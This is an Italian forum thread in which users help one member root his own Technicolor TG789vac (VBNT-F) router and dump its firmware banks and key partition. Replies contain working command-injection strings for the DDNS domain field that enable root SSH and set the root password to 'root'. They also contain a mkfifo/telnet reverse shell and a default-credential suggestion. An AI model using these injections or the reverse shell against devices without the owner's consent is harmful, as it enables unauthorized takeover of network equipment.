[TheBo]

Ciao. Scusate i miei tempi. Ho casini a lavoro e mi sto occupando di una persona che ha appena subito un intervento


Ad ogni modo

Product Vendor
Technicolor
Product Name
MediaAccess TG789vac Xtream 35b
Software Version
16.3
Firmware Version
16.3.7446-2921002-20170210093618
Firmware OID
589d7b8237ff23b76d3826b8
Bootloader Version
15.50.1005-0000000-20151209073757-4fd17452ef9fdf09e9f981340e5d6b3f85fe6c5a
Bootloader OID
unofficialbuildOID0000

[lorenzocanalelc]

Molto interessante, comunque se vuoi provare un modo veloce senza neanche usare AFG, inserisci questa stringa come service DDNS (Sulla Piastrella servizi DDNS)

Codice: [Seleziona]

;sed -i 's#root:/bin/false#root:/bin/ash#' /etc/passwd;uci set dropbear.@dropbear[0].PasswordAuth='on';uci set dropbear.@dropbear[0].Interface='lan';uci set dropbear.@dropbear[0].RootPasswordAuth='on';uci set dropbear.@dropbear[0].RootLogin='1';uci set dropbear.@dropbear[0].enable='1';uci set system.[member=77439]coredump[/member][0].reboot='0';sed -i 's/#//' /etc/inittab;uci commit;/etc/init.d/dropbear restart
Attiva il DDNS e salva le modifiche, dopo prova ad accedere via SSH e dovrebbe funzionare

[LuKePicci]

Ma è fastweb? Quando ci sarai entrato (prova come ha detto lorenzo, altrimenti vai con AFG su profili Generic) dovrai:
- dumpare la partizione eripv2 ed estrarre i vari tag e le chiavi OSIK/OSCK e condividerle
- dumpare le partizioni dei firmware bank_1 e bank_2 e condividerle

Trovi le istruzioni per tutte queste operazioni a questi due link:
https://hack-technicolor.readthedocs.io/en/latest/Resources/#making-dumps
https://github.com/pedro-n-rocha/secr

Dai dati in eripv2 c'è da capire se stiamo parlando di una VBNT-F o altro

[larsen64it]

Il bootloader è giusto.

[TheBo]

Rispondo come meglio posso...abbiate pazienza per me è nuovo.

@lorenzocanalelc  non ho idea di dove inserire la stringa...DDNS attivo, ma mi aspettavo di avere la possibilità di scegliere qualcosa dal menù dei servizi tipo CUSTOM o GENERIC e poi inserire la stringa, ma non lo trovo. Ho provato ad inserire la stringa nel domain e salvare ma Per ora via SSH mi chiede le credenziali ma mi nega l'accesso

@LuKePicci  Non è fastweb mi risulta, il prodotto non è marchiato. Era in inglese e penso avesse i parametri per Telsra, mettendolo in ita ho visto che puntava all ACS (di cui non ho ben capito ancora cosa sia) di telecomitalia....ergo lo sto usando con una ADSL2 di TIM

è un VBNT-F

[larsen64it]

https://i.imgur.com/RK7VLqp.png
Se hai netcat
Da terminale
nc -lvvn 1337
In domain inserisci

Codice: [Seleziona]

www.ooo.com; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet IP-DEL-PC 1337 >/tmp/f &Ti dovrebbe apparire la shell sul terminale

[LuKePicci]

Prova ad entrare in ssh con utente "engineer" e usa come password la access key che vedi sull'etichetta sotto il router.

[TheBo]

Se il servizio DNS scelto è irrilevante (non è presente DYN.com) allora direi che non funge. Nemmeno come engineer

[lorenzocanalelc]

Secondo me ha preso il comando ma la password di root non è root.

Inserisci anche questo codice sempre nello stesso posto e riprova

Codice: [Seleziona]

;uci set dropbear.@dropbear[0].PasswordAuth='on';uci set dropbear.@dropbear[0].RootPasswordAuth='on';uci set dropbear.@dropbear[0].enable='1';uci commit;echo -e "root\nroot" | passwd;/etc/init.d/dropbear restart

[TheBo]

niente ne come admin ne come engineer

aggiungo che  AFG sembra aver rootato e ho accesso SSH

BusyBox v1.23.2 (2016-12-21 02:03:31 UTC) built-in shell (ash)

  _______              __           __              __
 |_     _|.-----.----.|  |--.-----.|__|.----.-----.|  |.-----.----.
   |   |  |  -__|  __||     |     ||  ||  __|  _  ||  ||  _  |   _|
   |___|  |_____|____||__|__|__|__||__||____|_____||__||_____|__|
                 N E X T   G E N E R A T I O N   G A T E W A Y
 --------------------------------------------------------------------
 NG GATEWAY SIGNATURE DRINK
 --------------------------------------------------------------------
  * 1 oz Vodka          Pour all ingredients into mixing
  * 1 oz Triple Sec     tin with ice, strain into glass.
  * 1 oz Orange juice
 --------------------------------------------------------------------

Product: vbnt-f
Release: Aqua (16.3)
Version: 16.3.7446-2921002-20170210093618-fbf27c13310612f6d38e605ed532e895da594af2


Hash config:         fbf27c13310612f6d38e605ed532e895da594af2
Hash openwrt:        087b4b8c2d5342b346622213b03664593e11d6ce
Hash kernel:         88eba8d98482a41a407ab7bceb1a64f04dc0eb03
Hash packages:       5cf55b5e7a5bde79d5de52973ae5321b3a256b67
Hash technicolor:    ea94a55f26592663a851202fac56bf30729cdec2
Hash routing:        7b853f235ce96cd14f3abaebf9253c5ca7f72f7d
Hash lte:            3df0f5161445b2f1e91fb19614c9a345885bc444
Hash custo:          e81cae6bcaec58b6706fa643f7694cb00f654227
Hash mindspeed:      91b6a7a4d703268d6023c3a58da3d33fc62e7ed8

Bootloader: 15.50.1005-0000000-20151209073757-4fd17452ef9fdf09e9f981340e5d6b3f85fe6c5a

root@OpenWrt:~#

[LuKePicci]

Ottimo, procedi con i dump che ti ho indicato

[larsen64it]

Ma è un no-brand.

[TheBo]

è una domanda?

Cmq sto dumpando, ma ho perso tempo perchè ho fatto crashare l'apparato perchè per leggere la parte delle chiavi mi sono dimenticato di muovere il primo dump prima di fare il successivo.

[larsen64it]

Anche, perché fasweb personalizza anche il banner
Product: vbnt-f_fastweb

[TheBo]

ho finito i dump dei due Bank e della eripv2.... atteso ovviamente che la shell finisse....estraggo la chiavetta e vedo un mtd3 (bank1) plausibile di circa 40MB, un MTD4 (bank2) da 0b, e non vedo un mtd5 (eripv2).... accade spesso? rifaccio